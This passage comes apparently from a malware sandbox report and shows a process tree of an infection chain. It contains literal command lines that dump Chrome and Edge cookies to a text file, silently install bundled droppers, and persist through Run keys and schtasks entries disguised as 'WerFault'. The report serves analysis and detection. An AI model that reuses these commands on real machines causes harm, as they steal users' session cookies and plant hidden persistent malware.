                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        8⤵
                                                                                          PID:6088
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                          8⤵
                                                                                            PID:5292
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            8⤵
                                                                                              PID:7144
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              8⤵
                                                                                                PID:6176
                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:5624
                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4792
                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks whether UAC is enabled
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4152
                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1880
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5484
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5688
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                  PID:1600
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  8⤵
                                                                                                    PID:2596
                                                                                              • C:\Users\Admin\Documents\zlODTMZYLbv61MIM90LM7zSc.exe
                                                                                                "C:\Users\Admin\Documents\zlODTMZYLbv61MIM90LM7zSc.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4912
                                                                                              • C:\Users\Admin\Documents\mL5IH6lNdU0pZW8Rj6qtu9c9.exe
                                                                                                "C:\Users\Admin\Documents\mL5IH6lNdU0pZW8Rj6qtu9c9.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3372
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 660
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:1724
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 672
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:5024
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 780
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:3640
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 816
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:4300
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1124
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:5240
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 1076
                                                                                                  7⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Program crash
                                                                                                  PID:5432
                                                                                              • C:\Users\Admin\Documents\5L7H2qUFwoyDGq08KgkSyRuB.exe
                                                                                                "C:\Users\Admin\Documents\5L7H2qUFwoyDGq08KgkSyRuB.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4724
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  7⤵
                                                                                                    PID:5064
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4744
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    7⤵
                                                                                                      PID:7724
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      7⤵
                                                                                                        PID:5340
                                                                                                    • C:\Users\Admin\Documents\II6Xh9keHIjUF7oPARKeEJUR.exe
                                                                                                      "C:\Users\Admin\Documents\II6Xh9keHIjUF7oPARKeEJUR.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4940
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SFGVA.tmp\II6Xh9keHIjUF7oPARKeEJUR.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SFGVA.tmp\II6Xh9keHIjUF7oPARKeEJUR.tmp" /SL5="$201EE,138429,56832,C:\Users\Admin\Documents\II6Xh9keHIjUF7oPARKeEJUR.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:4704
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-C9S3I.tmp\Setup.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-C9S3I.tmp\Setup.exe" /Verysilent
                                                                                                          8⤵
                                                                                                            PID:5624
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                              9⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5840
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                10⤵
                                                                                                                  PID:7040
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                9⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Enumerates connected drives
                                                                                                                • Modifies system certificate store
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:5368
                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628125716 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                  10⤵
                                                                                                                    PID:5796
                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                  9⤵
                                                                                                                    PID:6012
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-JA81L.tmp\GameBoxWin32.tmp
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-JA81L.tmp\GameBoxWin32.tmp" /SL5="$4022E,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                      10⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:5076
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-2QHLM.tmp\Daldoula.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-2QHLM.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                                        11⤵
                                                                                                                        • Drops file in Drivers directory
                                                                                                                        • Adds Run key to start application
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:5156
                                                                                                                        • C:\Program Files\Microsoft Office\CCEQBKJYHR\ultramediaburner.exe
                                                                                                                          "C:\Program Files\Microsoft Office\CCEQBKJYHR\ultramediaburner.exe" /VERYSILENT
                                                                                                                          12⤵
                                                                                                                            PID:5732
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-G0VCH.tmp\ultramediaburner.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-G0VCH.tmp\ultramediaburner.tmp" /SL5="$40210,281924,62464,C:\Program Files\Microsoft Office\CCEQBKJYHR\ultramediaburner.exe" /VERYSILENT
                                                                                                                              13⤵
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:6048
                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                14⤵
                                                                                                                                  PID:6716
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bc-fdf3c-48c-14ab3-ce8f9b011fa02\Hajonagajo.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bc-fdf3c-48c-14ab3-ce8f9b011fa02\Hajonagajo.exe"
                                                                                                                              12⤵
                                                                                                                                PID:4480
                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                  dw20.exe -x -s 2256
                                                                                                                                  13⤵
                                                                                                                                    PID:6960
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9b-01590-735-eb781-7710f8ccce3a0\Bapaeqilyka.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\9b-01590-735-eb781-7710f8ccce3a0\Bapaeqilyka.exe"
                                                                                                                                  12⤵
                                                                                                                                    PID:5316
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jmwltk2q.bpq\GcleanerEU.exe /eufive & exit
                                                                                                                                      13⤵
                                                                                                                                        PID:6336
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u13kjwlw.o5a\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                        13⤵
                                                                                                                                          PID:4620
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\u13kjwlw.o5a\installer.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\u13kjwlw.o5a\installer.exe /qn CAMPAIGN="654"
                                                                                                                                            14⤵
                                                                                                                                              PID:4452
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\322hokyu.vj1\ebook.exe & exit
                                                                                                                                            13⤵
                                                                                                                                              PID:5060
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\322hokyu.vj1\ebook.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\322hokyu.vj1\ebook.exe
                                                                                                                                                14⤵
                                                                                                                                                  PID:4820
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-7FD85.tmp\ebook.tmp
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-7FD85.tmp\ebook.tmp" /SL5="$2040C,28982256,486912,C:\Users\Admin\AppData\Local\Temp\322hokyu.vj1\ebook.exe"
                                                                                                                                                    15⤵
                                                                                                                                                      PID:4980
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qfkwe1uq.zuo\md6_6ydj.exe & exit
                                                                                                                                                  13⤵
                                                                                                                                                    PID:7112
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qfkwe1uq.zuo\md6_6ydj.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\qfkwe1uq.zuo\md6_6ydj.exe
                                                                                                                                                      14⤵
                                                                                                                                                        PID:588
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qs33a53z.bnh\ufgaa.exe & exit
                                                                                                                                                      13⤵
                                                                                                                                                        PID:7012
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qs33a53z.bnh\ufgaa.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\qs33a53z.bnh\ufgaa.exe
                                                                                                                                                          14⤵
                                                                                                                                                            PID:7464
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              15⤵
                                                                                                                                                                PID:7708
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:6944
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:7940
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    15⤵
                                                                                                                                                                      PID:6232
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mpuxcioc.vnn\anyname.exe & exit
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:7816
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\mpuxcioc.vnn\anyname.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\mpuxcioc.vnn\anyname.exe
                                                                                                                                                                      14⤵
                                                                                                                                                                        PID:7268
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\mpuxcioc.vnn\anyname.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\mpuxcioc.vnn\anyname.exe" -q
                                                                                                                                                                          15⤵
                                                                                                                                                                            PID:6996
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o322dwok.o3r\gcleaner.exe /mixfive & exit
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:2768
                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  PID:5844
                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:2880
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3931586.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3931586.exe"
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:5916
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6496679.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6496679.exe"
                                                                                                                                                                        10⤵
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        PID:4344
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                          PID:6024
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7360515.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7360515.exe"
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:4604
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6217748.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6217748.exe"
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:6528
                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5832
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:4452
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:6772
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:6952
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:7120
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:2240
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE821994\sonia_6.exe
                                                                                                                                                                          sonia_6.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:2512
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:2244
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:1028
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5548
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:7840
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3752
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3116 -s 492
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Program crash
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:3612
                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:1228
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:192
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:5092
                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:2192
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1016
                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                          PID:2804
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:1376
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          schtasks.exe /create /tn "7741537" /sc ONLOGON /tr "'C:\Windows\IME\IMETC\DICTS\7741537.exe'" /rl HIGHEST /f
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:6856
                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:6712
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 6179348D79C7D03419018EF92AB1CCC5 C
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:6908
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding D30F148A681A5AFD226406DB3E1569A6
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:5396
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:788
                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 800664E0CF2589F49AE79E8D0175011B E Global\MSI0000
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:5344
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\ProgramData\Desktop\WerFault.exe'" /rl HIGHEST /f
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:6500
                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                          PID:6804
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:6544
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
